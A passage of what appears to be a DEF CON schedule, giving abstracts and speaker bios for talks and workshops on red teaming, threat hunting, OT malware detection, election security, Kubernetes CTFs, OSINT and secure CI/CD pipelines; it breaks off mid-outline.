This BTV panel brings together industry practitioners to share real-world experiences for successfully implementing strategic technologies within organizations. Through a structured 50-minute discussion, panelists provide actionable insights across the complete implementation lifecycle. The session covers implementation case studies, securing organizational buy-in, strategic roadmaps, and technical deployment challenges. Key focus areas include team development, psychological factors, ROI measurement frameworks, and common failure patterns to avoid. Interactive audience engagement ensures relevant discussion of current implementation challenges facing the cybersecurity community. Attendees will gain concrete strategies for driving technology adoption, success measurement frameworks, and connections with experienced practitioners. Ideal for security leaders, architects, and practitioners responsible for implementing new technologies, processes, or strategic initiatives within their organizations.
Speakers:Betta Lyon-Delsordo,Emily Soward,Todd Fletcher,Josiah LashleyBetta Lyon Delsordo began her cyber journey at the age of 13 when she started teaching herself to code. This grew into freelance web development work for small businesses in Montana, where she soon realized she needed to know more about application security to keep her clients safe. She began learning more about secure coding and interned with a hacking firm, and realized she was pretty good at it. After completing a Master's in Cybersecurity at Georgia Tech, obtaining certifications such as the GPEN, and working her way up through pentesting, Betta is now working as a Lead Application Penetration Tester at OnDefend. Her areas of expertise include application security, secure code review, cloud security, and AI hacking. Betta is very involved in the cybersecurity community and with organizations that support women in technology. She has been a mentor for 9 years with Technovation (an international girls coding program), and is an organizer and speaker for organizations promoting diversity in technology including RTC, WiCyS, WISP, and WSC.
SpeakerBio: Emily SowardEmily Soward has over 15 years of experience in AI R&D with specializations in governance, operations, and security. She is a serial innovator, inventor, founder, and leader in AI incident response, ecological and edge AI research, and AI security research. She is notable for her courses and teaching in AI governance, risk management, operations, and security, as well as her work on AI and ML frameworks for Amazon Web Services. Her contributions to the HITRUST Alliance AI Working Group supported the launch of the first cybersecurity certification for deployed AI systems. In 2024, she cofounded the AI Incident Response & Control (AIRCTL), an open-source project making top AI security skills accessible for small and under-resourced organizations.
SpeakerBio: Todd FletcherTodd Fletcher is a cybersecurity consultant and PhD student with over 25 years of experience in IT leadership, network, application, public government IT leadership, and security engineering. He currently works as a Professional Services Principal Consultant at CrowdStrike, a leading provider of cloud-native endpoint and workload protection solutions.
As a consultant, he assists information security teams from various sectors to assess their security posture, and develop plans to close security gaps while achieving technical and executive success. He is skilled in agile project management, systems automation, SIEM, SOAR, penetration tools, and security program development based on the NIST framework. He also conducts cloud security and automation with Azure DevSecOps.
In addition to his consulting role, he is pursuing a PhD in cyberpsychology, where he explores the psychological aspects of cybersecurity, such as user behavior, motivation, trust, and risk perception. He is passionate about pushing the boundaries of how to drive successful security initiatives from both a technical and psychological perspective with organizations across many industries.
SpeakerBio: Josiah LashleyFounding AI engineer at DeepTempo with a background in data science and detection engineering at Dragos, ad fraud detection at Human, and early experience as a SOC analyst in my university's SOC.
- ics Calendar file
DARPA’s Information Innovation Office (I2O) creates groundbreaking science and delivers future capabilities in the informational and computational domains to surprise adversaries and maintain enduring advantage for national security. Current research and development focuses on related areas including transformative AI, and offensive and defensive cyber.
Learn how the agency is leveraging advances in state-of-the-art AI to produce trustworthy cyber capabilities that operate beyond human capacity and speed – and anticipate adversary countermeasures to create enduring capabilities.
Speakers:Stephen Winchell,Dr. Kathleen Fisher,Allison KlineStephen Winchell joined DARPA as its 24th Director in May 2025. Prior to this appointment, he led the artificial intelligence and autonomy portfolio for the Defense Department’s Strategic Capabilities Office. Previously, he was chief engineer for the Pentagon’s Algorithmic Warfare Cross-Functional Team, commonly known as Project Maven. He is a graduate of the U.S. Naval Academy, where he later taught as a faculty member in the electrical and computer engineering department. He also served as a submarine officer in the U.S. Navy and continues to serve as an officer in the U.S. Navy Reserve. He has been a Presidential Innovation Fellow at the Intelligence Advanced Research Projects Activity and worked with a venture-backed start-up focused on AI security. He received a master’s in business administration from the University of Virginia, a master’s degree in systems engineering from the Johns Hopkins University, and a master’s degree in applied physics from the U.S. Naval Postgraduate School.
SpeakerBio: Dr. Kathleen Fisher, Director at DARPA's Information Innovations Office
- ics Calendar file
Please note: This two-day training will be offered on Saturday and Sunday (August 9-10). Participants will receive a DEF CON Human Badge with their registration
It is indeed all about the information. Information is power—and those who control it hold the reins. This course dives deep into the topic of Influence Operations (IO), teaching you how adversaries manipulate, deceive, and control the flow of information to achieve their objectives. From destabilizing governments to swaying elections and ruining careers, IO is a tool used by state and non-state actors alike. The question is, how do you defend against it?
In this fast-paced, hands-on course, we’ll break down how IO is planned, executed, and defended against. You’ll gain the skills and knowledge to not only recognize and counteract these operations but to protect yourself, your organization, and even your country from their impact.
What You'll Learn:
By the end of the course, you’ll not only have a deep understanding of how IO is executed, but you'll also walk away with practical tools to defend against these attacks. You’ll learn how to recognize the signs of manipulation, understand the motivations behind IO, and develop countermeasures to protect against them.
In a world where information is weaponized, knowing how to protect yourself is no longer optional. Whether you’re securing yourself, an organization, protecting a political campaign, or defending a nation, this course is your toolkit for navigating the complex and increasingly dangerous world of influence operations.
Speakers:Tom Cross,Greg ContiTom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993 and he ran bulletin board systems and listservs in the early 1990’s that served the hacker community in the southeastern United States. He is currently Head of Threat Research at GetReal Security, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was CoFounder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on Linkedin as https://www.linkedin.com/in/tom-cross-71455/, on Mastodon as https://ioc.exchange/@decius, and on Bluesky as https://bsky.app/profile/decius.bsky.social.
SpeakerBio: Greg Conti, Co-Founder and Principal at KopidionGreg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He’s taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.
Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.
Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).
- ics Calendar file
Las oportunidades en InfoSec están por todos lados, pero generalmente quedan enterradas entre diversos sitios web, publicaciones en redes sociales, o incluso en algún canal de la última app de mensajería que está de moda. Ya sea una meetup local, un CFP, una actividad de voluntariado, o la posibilidad de patrocinar una iniciativa, muchas personas y organizaciones pierden oportunidades simplemente porque no saben dónde buscar.
InfoSecMap nació para solucionar este problema. Es una plataforma gratuita, impulsada por la comunidad, que reúne todo el ecosistema global de InfoSec en un solo lugar. Destaca eventos, grupos y convocatorias de participación. Desde conferencias importantes hasta CTFs y encuentros pequeños en el bar de la esquina, InfoSecMap te ayuda a explorar qué está pasando por región geográfica o temática, y a descubrir dónde podés conectar y contribuir.
Si te importa la colaboración abierta, el conocimiento compartido y hacer crecer InfoSec en cada rincón del mundo, InfoSecMap es para vos.
SpeakerBio: Walter Martin Villalba, Principal Product Security Consultant at C13 Security LLCExperienced Software & Security Engineer with a demonstrated history of working in the Health Care & Security industry. Skilled in cybersecurity, penetration testing, cryptography, networking, videoconferencing, VoIP. Proficient in C++, with some exposure to Objective-C, Python, and Bash scripting.
- ics Calendar file
Charla o workshop de duración y contenido adaptable.x000D x000D La ingeniería inversa en hardware puede convertirse en algo tedioso sin una metodología que ayude en el proceso. Por otro lado, dejamos nuestra seguridad en manos de dispositivos fácilmente vulnerables, como sensores de alarmas y automatizaciones para portones. Por esta razón se plantea esta charla, para que una persona sin conocimientos previos tenga todos los elementos necesarios para determinar si esos dispositivos son seguros. x000D x000D Si bien la charla tiene conceptos técnicos variados, desde usar un osciloscopio, tomar muestras con analizadores lógicos y SDR o entender conceptualmente el funcionamiento de una placa, esta destinado a un público sin conocimientos previos, ya que se utiliza en todo momento un lenguaje simple para explicarlos.x000D x000D x000D (contexto)x000D Esta charla la doy en la eko en la villa de hardware hacking, pero nunca fue grabada. Han venido desde chicos de 15 años que recien se inician hasta adultos con mucha experiencia.
SpeakerBio: Mariano Marino, Consultor senior en seguridad @ Websec MexicoProgramador y consultor en seguridad en Websec y líder de la villa de hardware hacking en ekoparty.
- ics Calendar file
This comprehensive talk will provide an in-depth exploration of advanced threat hunting strategies, showcasing the methodologies employed in our recent reporting on the Decline of Black Basta. Attendees will learn how we tracked threat actor activity on the dark web, specifically focusing on Black Basta, to uncover emerging tactics, affiliations, and operational insights through analysis of illicit forums and marketplaces.x000D x000D The presentation will delve into techniques for monitoring the activities of ransomware-as-a-service (RaaS) groups, including how shifts in membership and operational practices occur after disbandment. Further, we will discuss how to harness investigation telemetry to detect and analyze evolving tactics, techniques, and procedures (TTPs). These approaches enable organizations to anticipate sophisticated cyber campaigns and proactively bolster their defensive strategies.x000D x000D By the end of this session, attendees will have actionable insights and practical methodologies to strengthen their threat detection capabilities, ensuring they stay ahead in the rapidly evolving cybersecurity landscape.x000D
SpeakerBio: John DilgenJohn Dilgen is a Cyber Threat Intelligence Analyst at ReliaQuest, where he specializes in researching cyber threats impacting ReliaQuest customers. With a strong technical background, he previously served as an Incident Response Analyst and Trainer at ReliaQuest.
- ics Calendar file
In this talk, I will present my analysis of the security and cryptographic architecture of Ente, an alternative to Google Photos. The aim is to demonstrate how application security and cryptography intersect to provide an end-to-end secure solution.
This talk will guide beginners through key concepts such as using a Key Derivation Function (KDF) to generate encryption keys, the purpose and use of envelope encryption, how to share photos using public key cryptography, and much more. Along with the theoretical concepts, I will show how this can be implemented in a secure library such as libsodium. By the end, attendees should be able to understand and reason about similar systems in the real world—and, if needed, take a shot at building one themselves.
SpeakerBio: Pushkar Jaltare, Security Architect at FastlyPushkar Jaltare is a Security Architect at Fastly, a leading Edge computing and Content Delivery Network. He acts as a security subject matter expert for different product lines, which include Edge Compute, Content Delivery, and Fastly’s WAF. He is also responsible for evaluating the security, privacy, and governance of SAAS vendors utilized by Fastly. His previous experience includes a stint at AWS, where he performed design reviews for widely used AWS services. He holds a Masters degree in Information Assurance from Northeastern University and is an expert in the fields of Application Security, Cryptography, Web Application Security, and Network Security.
- ics Calendar file
New to lock picking? Haven't picked in a year and need a refresher? Don't know a half-diamond from a turner? This talk is for you! Join one of our knowledgeable village volunteers as we walk you through the very basics of lock picking, from how to hold your tools to the theory behind the technique that makes lock picking possible.
SpeakerBio: TOOOL
- ics Calendar file
New to lock picking? Haven't picked in a year and need a refresher? Don't know a half-diamond from a turner? This talk is for you! Join one of our knowledgeable village volunteers as we walk you through the very basics of lock picking, from how to hold your tools to the theory behind the technique that makes lock picking possible.
SpeakerBio: TOOOL
- ics Calendar file
We take a different approach to learning Python programming - we break stuff! In this session we use the Thonny development tool to step line by line through a python program and to learn the principles of variables, input and output, making code reusable, and working with data stored in files. We will see what each line of python code does and how we can use that to create our own programs!
SpeakerBio: Bradán Lane, Bradán Lane StudiosBradán graduated third grade with a degree in crayon. This, combined with his unwavering belief in “how difficult could it be”, has made him eminently qualified to wash dishes. His background in UX Designer & User Research and as a purveyor of personas demonstrates his profound talent for making stuff up with confidence. Bradán pre-dates the internet and ARPANET.
- ics Calendar file
- ics Calendar file
CICDGuard is a graph based CICD ecosystem visualizer and security analyzer - 1. Represents entire CICD ecosystem in graph form, providing intuitive visibility and solving the awareness problem 2. Identifies common security flaws across supported technologies and provides industry best practices for identified flaws adhering to OWASP CICD Top10 3. Identifies the relationship between different technologies and demonstrates how vulnerability in one component can affect one or more other technologies 4. Technologies supported - GitHub, GitHub Action, Jenkins, JFrog, Spinnaker, Drone
CICD platforms are an integral part of the overall software supply chain and it processes a lot of sensitive data, compromise of which can affect the entire organization. One of the challenges with security OF CICD, like most areas of security, is the lack of visibility of what actually makes a CICD ecosystem. Security starts with being aware of what needs to be secure.
SpeakerBio: Pramod RanaHe has presented at BlackHat, Defcon, nullcon, OWASPGlobalAppSec, HackMiami, HackInParis and Insomnihack before.
He is leading the application security team in Netskope with primary focus on integrating security controls in the development process and providing security-testing-as-a-service to engineering teams.
- ics Calendar file
In this workshop we will start from scratch with nothing more than a GCP project. The only requirement to participate in this workshop is a laptop with an internet connection. We will deploy a virtual machine, install and configure the Mythic C2 Server. We will deploy a virtual machine, deploy and configure the Nemesis offensive data enrichment pipeline and operator support system. We will deploy a mythic-connector to send data automatically from Mythic to Nemesis. We will compromise a vulnerable application and deploy a Mythic C2 agent to said application, then exfiltrate data. We will clone my custom fork of RAGnarok locally and process said data from Nemesis using local, offline AI LLM models. (This can also be done in the cloud but I won’t be providing cloud GPU instances for obvious reasons.) We will then use the insights from this data to compromise another more secure host.
Speakers:Gabi Joseph,Josh MillsapI have been Red Teaming for 4 years with an academic background in AI/ML.
SpeakerBio: Josh MillsapI am on the Red Team for Palo Alto Networks. I lead the development, automation, and AI efforts for the team.
- ics Calendar file
We live in a time where we can buy practically anything online. It's very tempting to buy cheap products online, including electronics. While saving money can be great, what are we really getting here? Where did it really come from, is it safe to use, and what is really going on behind the scenes? Let's find out!x000D In this talk, we'll track the supply chain of a foreign smartwatch on Amazon using various OSINT techniques. After going down the rabbit hole, we’ll perform a hardware/software breakdown with automated and manual analyses (and further OSINT based on our findings). By the end of the talk, you will have a better understanding of some of the tools and processes you can use for performing your own due diligence.
SpeakerBio: Michael PorteraMichael Portera is the Vice President of Cyber Solutions at Sequoia, Inc. In this role, Michael contributes heavily to Sequoia’s cybersecurity initiatives and serves as a key advocate for the company’s cutting-edge cloud solutions across the national security sector. Michael spent eight years in Big Four consulting (KPMG and Deloitte), where he delivered IT and cybersecurity services to both public and private sector clients. He later worked as a Red Team Operator and, in 2020, founded a cybersecurity firm that was acquired in 2023. In 2020, he founded a cybersecurity company, which he sold in 2023. He has presented at major conferences and contributes to open-source projects when time allows. Outside of work, he’s a proud girl dad (x2), enjoys video games, vacations with his family, and board games with friends.
- ics Calendar file
Forget the noise.
Get to JustHacking.com!
2 Mini-Workshops
Only 15 Minutes Each
Talk to Your “Things” with MQTT
Learn device comms in a virtual smarthome
Router Ruh Roh!
Find clues of an attack in OpenWRT firmware
No Schedule! Just sit down & start learning!
- ics Calendar file
End-to-End-Verifiability (E2E-V) is a cryptographic paradigm that, as applied to voting systems, allows voters to independently verify that their votes were cast as intended, guaranteeing that votes were recorded as cast, and tallied as recorded. As such, it is being promoted to public officers and elected officials at the county and state levels as the “magic bullet” allowing for secure voting over the internet. This talk will argue, in a relatively low-tech way, that E2E-V is irrelevant to some attacks – both to servers outside the cryptographic “loop,” and particularly to client-side systems. E2E-V-equipped voting systems are primarily vulnerable to client-side malware, which would still be free to alter or sabotage voting applications and devices. The talk will present opinions from technical experts on E2E-V. These perspectives are juxtaposed against opinions and rhetoric from the commercial promoters of internet voting systems.
SpeakerBio: John Odum, City Clerk, Montpelier VermontJohn Odum is the elected City Clerk of Montpelier, Vermont, and his primary responsibility is the administration of elections. John holds a Certified Municipal Clerk certification from the International Institute of Municipal Clerks and holds a certificate in Election Administration from the University of Minnesota Humphrey School of Public Affairs. In the past, he has worked as a political organizer, including as the statewide Field Director for the Clavelle for Governor Campaign. He has worked in IT capacities as a Network Administrator and the Clinic Systems Application Administrator for the Vermont Democratic Party and Planned Parenthood of Northern New England respectively. John is a hobbyist hacker in his spare time and holds Certified Ethical Hacker and Certified Network Defense Architect certifications from EC-Council. His first hack was a Prime 400 PRIMOS computer system. John has been active in election issues in the Vermont legislature for years, lobbying for election-day registration and automatic voter registration. As a 2022 candidate for Vermont Secretary of State, John championed election cybersecurity, ranked choice voting, and universal vote-by-mail.
- ics Calendar file
The prospect of voting over the Internet has long attracted voters, election officials and civil rights advocates, but casting ballots online includes unique security challenges and requirements that first must be satisfied before online voting will be secure. This panel discussion will delve into the specific challenges inherent with Internet voting, review the security research that’s been conducted, and discuss the current state of online voting in the U.S.
Speakers:Matt Blaze,Susan Greenhalgh,David Jefferson,Michael SpecterMatt Blaze is the McDevitt Chair of Computer Science and Law at Georgetown University, where his research focuses on problems at the intersection of technology, public policy, and law. Prior to joining Georgetown, he was a professor of computer science at the University of Pennsylvania, and prior to that, a founding member of the Secure Systems Research Department at AT&T Bell Labs. He holds a PhD in computer science from Princeton, an MS from Columbia, and a BS from the City University of New York. Blaze's scholarship and practical work in high-integrity voting and elections technology dates back more than 25 years. He led teams that examined source code for security vulnerabilities on behalf of the states of California and Ohio for the Top-to-Bottom Review and EVEREST studies. He has testified on election security and other topics before the US Congress over a dozen times, served on various federal and state advisory boards, and has published numerous scholarly research papers on elections and related subjects. He is a founding member of the DEFCON Voting Village, and currently serves as board chair of the Election Integrity Foundation.
SpeakerBio: Susan Greenhalgh, Free Speech For PeopleSusan Greenhalgh is the Senior Advisor on Election Security for Free Speech For People. Ms. Greenhalgh has previously served as vice president of programs at Verified Voting and at the National Election Defense Coalition, advocating for secure election protocols, paper ballot voting systems and post-election audits. Recognized as an expert on election security, she has been invited to testify before the U.S. Commission on Civil Rights and has been an invited speaker at meetings of the MITRE Corporation, the National Conference of State Legislatures, the Mid-West Election Officials Conference, the International Association of Government Officials, the Election Verification Network and the E-Vote-ID conference in Bregenz, Austria. She is a frequent source for reporters from TheNew York Times, The Washington Post, The Wall Street Journal, Politico, USAToday, Associated Press, National Public Radio and other leading news outlets. She has appeared on CNN and MSNBC’s The Rachel Maddow Show, and various other television news shows. She has a BA in Chemistry from the University of Vermont.
SpeakerBio: David Jefferson, Lawrence Livermore National Laboratory (retired), Election Integrity Foundation, DrDr. Michael specter is an Assistant Professor, Computer Science and in Cybersecurity & Privacy at Georgia Tech. His research focuses on systems security and applied cryptography, particularly in areas relevant to public policy. Topics of interest include surveillance, cryptographic accountability, content moderation, misinformation, and elections security. He is well-known in the election security community for his study and critiques of both the Voatz and Democracy Live Internet voting systems.
- ics Calendar file
Mike Specter has examined both the Voatz and Democracy Live online voting systems. This presentation will discuss those findings, how this research was received, and its lasting impact on online voting.
SpeakerBio: Michael Specter, Georgia TechDr. Michael specter is an Assistant Professor, Computer Science and in Cybersecurity & Privacy at Georgia Tech. His research focuses on systems security and applied cryptography, particularly in areas relevant to public policy. Topics of interest include surveillance, cryptographic accountability, content moderation, misinformation, and elections security. He is well-known in the election security community for his study and critiques of both the Voatz and Democracy Live Internet voting systems.
- ics Calendar file
Defeat the Keysight CTF challenge for a change to win a Riscuberry IoT hacking training kit that comes with a picoscope, a bus pirate, and much more!
See one of the Keysight staff for details.
- ics Calendar file
Throughout our Red Team operations, we've focused our research on advancing techniques to gain direct access to physical memory and achieve execution with the highest privileges (Kernel-mode). This talk presents the current state of the art in stealthy post-exploitation, sharing innovative approaches and refined methodologies developed over recent years. Topics include: bypassing modern EDR solutions via physical memory access primitives, physical access techniques and advanced post-exploitation techniques in Windows systems. We will demonstrate how low-level access vectors often overlooked can enable persistent, undetectable control over targeted systems. The session is tailored for cybersecurity professionals interested in cutting-edge Red Team tactics and emerging hardware/software threats. Practical demos will be included, along with tools and methodologies applicable across multiple scenarios. This is a deeply technical talk, showcasing real world tradecraft and threat modeling beyond traditional offensive security.
References:
Red Team Operator and Security Researcher with over ten years of experience in offensive cybersecurity. Throughout his career, he has worked hands-on in assessing, exploiting and mitigating security vulnerabilities, developing proof-of-concepts, offensive and defensive tools, and conducting in-depth security research on commercial and proprietary solutions. His approach is based on a combination of applied research and real-world experience, emphasizing continuous learning and optimization of defense and attack strategies.
SpeakerBio: Borja "borjmz" MartinezComputer security has been a passion for him for as long as he can remember. He is self-taught and seeks to learn something new every day, both professionally and personally. Specialist with more than 9 years of experience in pentesting, Red Team and Research, having a highly versatile profile. He is also a CTF player.
- ics Calendar file
On Saturday, we have a timed competition from 10:30a-5:30pm on a new scenario. Each team/individual is given Kubernetes API access to a team-specific cluster for each flag. The team can capture flags and win points as they progress. A scoreboard tracks the teams’ current and final scores. In the event of a tie, the first team to achieve the score wins that tie. This is open to only 30 teams and only from Saturday 10:30am - 5:30pm Pacific.
- ics Calendar file
On Friday through Sunday, we have a non-competitive learning run, where you can go through the Kubernetes CTF scenario from a previous year. It has an available "cheat sheet" that shows you how to run through, start to finish! You can do this without the "cheat sheet" if you want a puzzle.
Each team/individual gets a Kubernetes cluster that contains a set of flags.
This is open to up to 30 teams and is available from Friday 12pm to Sunday 12pm Pacific.
We will support DEF CON players in the contest area during the following times: - Friday: 12:00-17:00 - Saturday: 10:00-17:00 - Sunday: 10:00-12:00
- ics Calendar file
The tool runs a full‑stack inspection in minutes and organizes findings into five actionable domains:
Cluster Setup & Hardening – benchmarks every control‑plane and node flag against CIS, highlights risky admission‑controller and RBAC settings, and maps network‑policy blind spots.
System Hardening – validates kernel parameters, kubelet options, container‑runtime and gVisor profiles to keep the host layer sealed tight.
Microservice Vulnerability Reduction – enforces least‑privilege at pod and container level by checking security contexts, resource limits, disruption budgets, and secrets hygiene.
Supply‑Chain Security – blocks bad code before it ships by verifying image signatures and SBOMs, scanning for CVEs and license red flags, and flagging stale or untrusted artifacts.
Runtime Security – confirms audit‑policy coverage, validates Falco rules and alert paths, and streams suspicious events so you can react in real time.
Attendees will deploy the scanner against a vulnerable “Kubernetes Goat” cluster, interpret it's reports, and remediate high‑impact issues live. By the end of the session you’ll leave with a repeatable workflow that delivers prescriptive, line‑item fixes from cluster creation through day‑2 operations—no guesswork, just secure‑by‑design Kubernetes.
SpeakerBio: Krishna PriyaSenior SRE engineer at Cloud Software Group. I have worked on on premise and cloud deployments and have seen the industry evolve to its current state. I have been advocating for better secure defaults and secure deployments for over a decade and have created training material for engineers and tooling that can help automate this. You can see my open source work @ https://github.com/krishpyishere/
- ics Calendar file
Cuando cae la noche, La Villa sigue viva. Te invitamos al After Hours del sábado, un evento relajado de networking para conectar con speakers, organizadores, hackers y entusiastas en un ambiente informal. Comparte ideas, proyectos o simplemente disfruta de una buena charla con la comunidad. ¡Trae tu energía, tus stickers y tus ganas de convivir fuera del horario técnico!
- ics Calendar file
This demo will showcase a budget-friendly DIY laser fault injection rig, originally designed for the RP2350 Hacking Challenge. We will cover the mechanical preparation of QFN-packaged ICs, infrared die imaging, and the driving of high-power laser diodes to induce faults.
SpeakerBio: Kévin Courdesses
- ics Calendar file
- ics Calendar file
Kit cost $135
- ics Calendar file
For those ambitious threat actors targeting on OT/ICS field, their actions invariably are highly intensity planed to produce successful hacking. By abusing multiple misconfigurations and benign OT-specific nature infrastructure to evade multiple layers of protection, they can stealthily control the factory’s essential assets from IT to OT fields. For example, according to Mandiant’s report, the Russian hacker group, Sandworm, abused OT-level LoTL (Living Off the Land) to disrupt power in Ukraine. The key to success is abusing those OT-specific protocols, techniques, and LOLBins which are difficult to detect as malicious by modern AV/EDR.
In this research, instead of detecting MALICIOUS, we propose a novel multimodal AI detection, Suspicious2Vec, which archives contextual comprehension on process integrity and suspicious behaviors of OT/ICS benign operation. We use the AI model on large-scale real-world factories, to create a baseline of universal nature OT-specific operating into numerical vectors and success filter in-the-wild anonymous abuse for attacks into malicious.
From July 2023 to July 2024, our experiment whole year to received 2,000,000 data which were detected as unique suspicious techniques by 562+ human-written expert rules. We use the AI model to project those suspicious actions into numerical vectors by well-known word embedding methods, and also model all the suspicious behaviors from the OT + IT malware family from VirusTotal to generate a set of malware templates as neural ASR (Attack Surface Reduction) rules for detection, and success capture 12+ variant OT malware from 52,438 factory program files.
Speakers:Mars Cheng,Jr-Wei HuangMars Cheng is the Head of Cyber Threat & Product Defense Center at TXOne Networks Inc., responsible for leading three subgroups within the center: PSIRT, Advanced Threat Research Group, and Threat Operation Group. Additionally, he serves as the Executive Director of the Association of Hackers in Taiwan (HIT/HITCON) and General Coordinator of HITCON CISO Summit 2025; he plays a pivotal role in fostering collaboration between enterprises and government entities to strengthen cybersecurity. His expertise encompasses ICS/SCADA systems, malware analysis, threat intelligence and hunting, blue team, and enterprise security. A seasoned speaker, Mars has delivered over 60 presentations at international cybersecurity conferences, including Black Hat USA, Europe, and MEA, RSA Conference, DEF CON, CODE BLUE, FIRST, HITB, HITCON, Troopers, NOHAT, SecTor, S4, SINCON, and ROOTCON, among others. He has successfully organized several notable HITCON events, including the HITCON CISO Summit in 2023 and 2024, HITCON PEACE 2022, and HITCON 2021 and 2020.
SpeakerBio: Jr-Wei Huang, Senior Threat Researcher of Cyber Threat & Product Defense Center at TXOne Networks IncJr-Wei Huang is a Senior Threat Researcher of Cyber Threat & Product Defense Center at TXOne Networks Inc., specializing in threat hunting, detection engineering, and malware analysis. He has 3 years hands-on experience in developing EDR product features and designing effective detection strategies. Jr-Wei Huang has spoken at conferences such as HITCON, JASEC, and CYBERSEC Taiwan, covering topics including Windows and macOS security, blue team operations, and detection engineering. He has also delivered lectures and training sessions for universities and private companies across Taiwan.
- ics Calendar file
Enigma was the infamous German encryption machines that was used in World War 2. A group of British cryptographers successfully broke the sophisticated machine, and in doing so, gave rise to modern adversarial cryptography and the Turing Machine, which would later evolve into the computer. In this workshop, we will look at how adversarial cryptography initially formed and how many of the techniques used still apply today. Additionally, many of the mathematical principles used in both the construction of the Enigma machine and its subsequent breaking are used heavily in modern encryption, which directly relate to the technology used in cryptocurrency.
Speakers:Rigo Salazar,Luke SzramowskiRigo Salazar is a Gen Z who is a Millennial in spirit with a Master’s degree in Mathematics and a Bachelor’s in Civil Engineering… for some reason. Jigsaw puzzles, puppetry, and platforming are a handful of his hobbies, but his true loves are his family, friends, and prime numbers. With boisterous whimsy and the volume to match, Rigo is so excited for his second Defcon and the opportunity to talk about cryptography.
SpeakerBio: Luke SzramowskiLuke Szramowski is a mathematical researcher, with a Bachelor's Degree in Mathematics and two Master's Degrees, one in Math, with a focus in Number Theory and another in Math with a focus in Coding Theory. In his free time, Luke works on a litany of different math problems, mainly regarding Number Theoretic conjectures and playing all different types of games. He is very excited to talk about any cryptography related questions and is looking forward to his first DEF CON.
- ics Calendar file
OWASP Cornucopia is a card game to assist software development teams identify security requirements in agile, conventional, and formal software development processes. It is language, platform, and technology agnostic. Having celebrated its 10th anniversary last year, Cornucopia has been refreshed including an updated full version of the game, a new Website App Edition updated with the OWASP ASVS 4.0 mapping and a Mobile App Edition with the OWASP MASVS 2.0 mapping for mobile development.
SpeakerBio: Spyros Gasteratos
- ics Calendar file
Dive into the dynamic world of Open Source Intelligence (OSINT) with this quick workshop designed to give you a taste of practical online investigations and threat hunting. Led by a seasoned professional, this immersive session offers a condensed yet impactful introduction to essential OSINT techniques that you can use in your red teaming engagements.
Experience the power of hands-on learning as you engage in live demonstrations, exploring key concepts such as operational security (OpSec), advanced search engine queries, username and phone number lookups, social media reconnaissance, breached records analysis, network reconnaissance, historical records, and essential documentation, all within the span of this engaging workshop. Through interactive exercises and guided discussions, participants will gain a glimpse into the world of OSINT.
Who’s it for?
This training is suited for all individuals in any field with a keen interest in online investigations regardless of their experience level in OSINT
SpeakerBio: Mishaal Khan, Privacy ExpertMishaal is a subject matter expert in cybersecurity, pentesting, privacy, Open Source Intelligence and social engineering and a frequent speaker on these topics at Universities and popular cybersecurity conferences like DEF CON, Black Hat, Wild West Hackin Fest, TEDx, and multiple BSides Security events.
Mishaal has worked with multinational companies for over 20 years, securing their networks and providing executive level consultancy as a CISO to manage risk and avoid breaches. He's the author of the book; The Phantom CISO, runs a cybersecurity practice as a vCISO and owns a privacy management and investigations firm.
- ics Calendar file
What does the "perfect" CI/CD pipeline look like, especially one built with security at its core? This hands-on workshop explores that ideal using readily available open-source tools. We'll dissect the essential stages of a modern pipeline, demonstrating how to integrate security seamlessly throughout the development lifecycle (DevSecOps).
Through practical, step-by-step guidance, we'll implement key security checks like iinfrastructure vulnerability scanning, secrets detection and code analysis using popular OSS tools within a functional pipeline. We won’t forget about the pipeline security itself, we will review best practices to secure our CI/CD process. While we'll showcase specific tools and configurations, the goal is not just replication, but understanding how and why these security controls work.
Discover the underlying principles of secure pipeline design and leave with actionable techniques to start building your own hardened, practical CI/CD pipeline.
Outline:
Introduction
Brief presenter introduction.
Setting the stage: The need for secure CI/CD pipelines.
Fundamentals Recap:
Quick overview: What is Continuous Integration, Continuous Deployment and Continuous Security?
Scope & Learning Objectives
Workshop Focus: Demonstrate building a "perfect" (secure and practical) CI/CD pipeline using open-source tools.
Key Goal: Inspirational, not prescriptive. Attendees should understand the principles and identify modular components they can adapt to their own environments. The aim is to grasp the idea of a secure pipeline, not to replicate this specific example verbatim.
Learning Outcomes: Attendees will understand the key stages of a secure pipeline, know relevant OSS tools for each stage, and grasp the principles needed to start building or improving their own secure CI/CD process.
Out of Scope (What this workshop is NOT):
Deep dives into specific development workflows (e.g. Gitflow, Trunk-based).
Focus on a specific application technology stack (language/framework agnostic where possible).
A definitive statement on the "best" tools (alternatives will be mentioned for key steps).
Assumption: We will work from a simplified "greenfield" perspective for clarity.
"Perfect Secure Pipeline" Overview
Secure Pipeline Step-by-Step Breakdown (Hands-On)
For each key stage (e.g., Pipeline Scan, IaC Scan, Container Scanning, Secrets Detection, SAST/SCA):
Goal: What security risk are we trying to mitigate with this step?
OSS Tool Demo of the chosen open-source tool (e.g., Chekov for IaC, Trivy for container scanning, Gitleaks for secrets). Briefly mention 1-2 alternatives.
Live Demo - Break & Fix:
